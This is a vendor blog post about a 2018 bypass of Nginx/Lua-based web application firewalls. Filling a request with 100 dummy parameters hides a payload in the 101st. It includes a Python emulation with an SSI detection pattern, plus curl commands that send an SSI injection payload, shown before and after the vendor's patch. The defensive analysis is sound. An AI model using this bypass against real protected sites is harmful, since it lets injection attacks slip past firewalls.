On October 25, 2018, Daniel Farina, a researcher at Open Data Security (ODS), published a study describing a weakness in the Nginx-based server software that Cloudflare's platform runs on. The weakness lets the platform's Web Application Firewall (WAF) be bypassed, so that attacks the firewall would normally block reach the protected web application.
VNETWORK took an interest in this study because we are building our own Cloud WAF, VNIS, on the same Nginx server software.
What exactly is the vulnerability?
The Lua module for Nginx (ngx_lua, the module OpenResty is built on) caps how many request arguments it will parse. To guard against denial-of-service attacks, only the first 100 request parameters are parsed by default (parameters with the same name are each counted separately), and every parameter beyond the 100th is silently discarded. A WAF that inspects the parsed argument list therefore never sees a payload placed in the 101st parameter or later.
Any firewall built on Nginx and Lua that relies on this parsed argument list inherits the same parameter-limit bypass.
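The following is an added example, not code from the original article or from the VNIS or OpenResty projects. It emulates the documented behaviour of ngx.req.get_uri_args() (a default cap of 100 arguments, the remainder dropped) in plain Python, rebuilds the 100-plus-1 parameter request used in the tests on this page, and runs it through a WAF check written two ways: inspecting the capped list as-is, and failing closed when the cap was hit. The function names, the `<!--#` signature and the sample queries are all constructed for this example.

```python
import re
from urllib.parse import unquote

# ngx_lua's default cap for ngx.req.get_uri_args() / ngx.req.get_post_args():
# only the first 100 arguments are parsed, the rest are silently dropped.
DEFAULT_MAX_ARGS = 100

# The SSI payload from the page's tests, URL-encoded: "<!--#cmd".
PAYLOAD = "<%21--%23cmd"

# Constructed signature for this example: flag an SSI directive opener in any
# parameter name or value. A real WAF rule set is far broader than this.
SSI_PATTERN = re.compile(r"<!--#", re.IGNORECASE)


def get_uri_args(query, max_args=DEFAULT_MAX_ARGS):
    """Emulate ngx.req.get_uri_args(max_args) on a raw query string.

    Returns (args, truncated). args is a list of (name, value) pairs in
    request order, percent-decoded; a field without '=' gets value "" here
    (ngx_lua gives it the Lua value true, which makes no difference for
    inspection). max_args=0 means no limit. Arguments past the cap are dropped
    and truncated is set to True, mirroring the module's documented behaviour.
    """
    args = []
    truncated = False
    for field in query.split("&"):
        if field == "":
            continue
        if max_args and len(args) >= max_args:
            truncated = True
            break
        name, _sep, value = field.partition("=")
        args.append((unquote(name), unquote(value)))
    return args, truncated


def waf_inspect(args):
    """Return True if any parameter name or value matches the signature.

    Names must be scanned too: in the 101-parameter test the payload is sent
    as a bare field with no '=', so it arrives as a name, not a value.
    """
    return any(SSI_PATTERN.search(n) or SSI_PATTERN.search(v) for n, v in args)


def vulnerable_waf(query):
    """Before the patch: inspect the default-capped argument list and ignore
    whether it was truncated. Returns an HTTP status code."""
    args, _truncated = get_uri_args(query)
    return 403 if waf_inspect(args) else 200


def hardened_waf(query, max_args=DEFAULT_MAX_ARGS):
    """After the patch: keep the DoS cap but fail closed. A request carrying
    more parameters than the WAF is willing to inspect is rejected outright,
    so nothing can hide past the cap. (Parsing with max_args=0 and inspecting
    everything is the other option; it gives up the DoS guard instead.)"""
    args, truncated = get_uri_args(query, max_args)
    if truncated:
        return 403
    return 403 if waf_inspect(args) else 200


def build_query(n_filler, payload=PAYLOAD):
    """Rebuild the page's test request: a0..a9 each repeated ten times
    (n_filler=100), followed by the payload as the final parameter."""
    filler = [f"a{i // 10}={i // 10}" for i in range(n_filler)]
    return "&".join(filler + [payload])


if __name__ == "__main__":
    for label, q in [
        ("1 parameter   ", "txtSearch=" + PAYLOAD),
        ("100 parameters", build_query(99)),
        ("101 parameters", build_query(100)),
    ]:
        print(f"{label}: before patch -> {vulnerable_waf(q)}, "
              f"after patch -> {hardened_waf(q)}")
```

With 99 filler parameters the payload is the 100th argument and both versions return 403; with 100 filler parameters it is the 101st, the capped parser drops it, and the unpatched check returns 200 while the fail-closed check returns 403. On OpenResty itself the equivalent fix is to stop relying on the default of ngx.req.get_uri_args(): either pass 0 to parse every argument, or check the function's second return value, which current lua-nginx-module versions set to the string "truncated" when the cap was hit, and reject the request in that case. The same cap applies to ngx.req.get_post_args(), so form bodies need the same treatment.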
So why did VNIS need to patch this flaw?
Rather than wait for Cloudflare to address the flaw in its own platform, our developers shipped an update to VNIS that blocks malicious requests exploiting the Lua-Nginx parameter limit, so VNIS users are protected.
The following tests by VNETWORK programmers confirmed that the fix works.
Before the patch
Test with one parameter:
```
curl -i '127.0.0.1/?txtSearch=<%21--%23cmd' -H "Host: demo.1testfire.net"
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 13 Dec 2018 07:08:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Error Page</title><link rel="stylesheet" type="text/css" href="__assets/css/style.css"><link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet"></head><body><div class="wrapper"><h1>ACCESS DENIED<span>Your request to access demo.1testfire.net was denied</span></h1><p class="error_info"><span>Incident ID </span>31c75a46e100079d1449f5e4db85d6de</p><p class="error_info"><span>Your IP </span>127.0.0.1</p><img src="__assets/img/process_img.png"><div class="next_Step"><p><span>What happened ?</span>The website you are trying to access is protected against cyber attacks. Your recent action or behavior was flagged as suspicious. Further access to the web server has been denied.</p> <p><span>What can I do ?</span>Please try again in a few minutes. Or, you can directly contact the site owner within Event ID indicated and a description of what you were doing before you were denied access.</p></div><span class="copyright">Powered by mlytics.com</span></div></body></html>
```
Test with 100 parameters (a0 through a9, each repeated 10 times) and then add the payload as the 101st parameter:
```
curl -i '127.0.0.1/?a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&<%21--%23cmd' -H "Host: demo.1testfire.net"
HTTP/1.1 200 OK
Server: Nginx
Date: Thu, 13 Dec 2018 07:20:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2vb4y5453apg1cvpakfjigip; path=/; HttpOnly
Set-Cookie: amSessionId=6207394219; path=/
X-Powered-By: ASP.NET
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head id="_ctl0__ctl0_head"><title>…
```
With fewer than 100 parameters the WAF intercepts the request without difficulty. Once the count passes 100, however, the WAF never parses the 101st parameter, so the payload it carries is not inspected and the request is passed through to the origin (HTTP 200).
After the patch
Test with one parameter:
```
curl -i '127.0.0.1/?txtSearch=<%21--%23cmd' -H "Host: demo.1testfire.net"
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 13 Dec 2018 07:08:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Error Page</title><link rel="stylesheet" type="text/css" href="__assets/css/style.css"><link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet"></head><body><div class="wrapper"><h1>ACCESS DENIED<span>Your request to access demo.1testfire.net was denied</span></h1><p class="error_info"><span>Incident ID </span>31c75a46e100079d1449f5e4db85d6de</p><p class="error_info"><span>Your IP </span>127.0.0.1</p><img src="__assets/img/process_img.png"><div class="next_Step"><p><span>What happened ?</span>The website you are trying to access is protected against cyber attacks. Your recent action or behavior was flagged as suspicious. Further access to the web server has been denied.</p> <p><span>What can I do ?</span>Please try again in a few minutes. Or, you can directly contact the site owner within Event ID indicated and a description of what you were doing before you were denied access.</p></div><span class="copyright">Powered by mlytics.com</span></div></body></html>
```
Test with 100 parameters (a0 through a9, each repeated 10 times) and then add the payload as the 101st parameter:
```
curl -i '127.0.0.1/?a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&<%21--%23cmd' -H "Host: demo.1testfire.net"
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 13 Dec 2018 07:18:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Error Page</title><link rel="stylesheet" type="text/css" href="__assets/css/style.css"><link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet"></head><body><div class="wrapper"><h1>ACCESS DENIED<span>Your request to access demo.1testfire.net was denied</span></h1><p class="error_info"><span>Incident ID </span>-</p><p class="error_info"><span>Your IP </span></p><img src="__assets/img/process_img.png"><div class="next_Step"><p><span>What happened ?</span>The website you are trying to access is protected against cyber attacks. Your recent action or behavior was flagged as suspicious. Further access to the web server has been denied.</p> <p><span>What can I do ?</span>Please try again in a few minutes. Or, you can directly contact the site owner within Event ID indicated and a description of what you were doing before you were denied access.</p></div><span class="copyright">Powered by mlytics.com</span></div></body></html>
```
After the patch the payload in the 101st parameter is blocked just like the payload in the first, so VNIS users are protected against this bypass.
Explore more about VNIS
VNIS is a platform that combines security with performance features, so that business websites are not only protected but also optimized for delivery speed, giving visitors a better experience.
Cloud-based firewall (Cloud WAF - Web Application Firewall)
VNIS's Cloud WAF is cloud-based and distributed across many countries, with a tunable Core Rule Set (CRS) to help keep your website safe from attacks targeting the web application layer (Layer 7), where business-critical data is handled. VNIS also integrates over 2,000 security rules to help prevent targeted attacks. Based on the OWASP Top 10, the VNIS firewall can detect and automatically block the serious vulnerability classes listed there, such as Broken Access Control, SQL Injection and Cryptographic Failures, to keep your business website protected and well maintained.
Multi-CDN (Multi-Content Delivery Network)
VNIS has a robust Multi-CDN network with over 2,300 points of presence worldwide and aggregate CDN bandwidth of up to 2,600 Tbps, which lets it serve up to 6 billion visitors simultaneously. This capacity also helps protect the business website from attacks such as DDoS and botnets that target the network layer (Layer 3) and transport layer (Layer 4). The VNIS Multi-CDN is coupled with Real User Monitoring (RUM) and AI-based load balancing, which helps organizations manage harmful and malicious access to their websites and keeps the website performing at its best even while under attack.
To request a trial or learn more about the website/app anti-exploit service, leave your contact information below or call our hotline: (028) 7306 8789.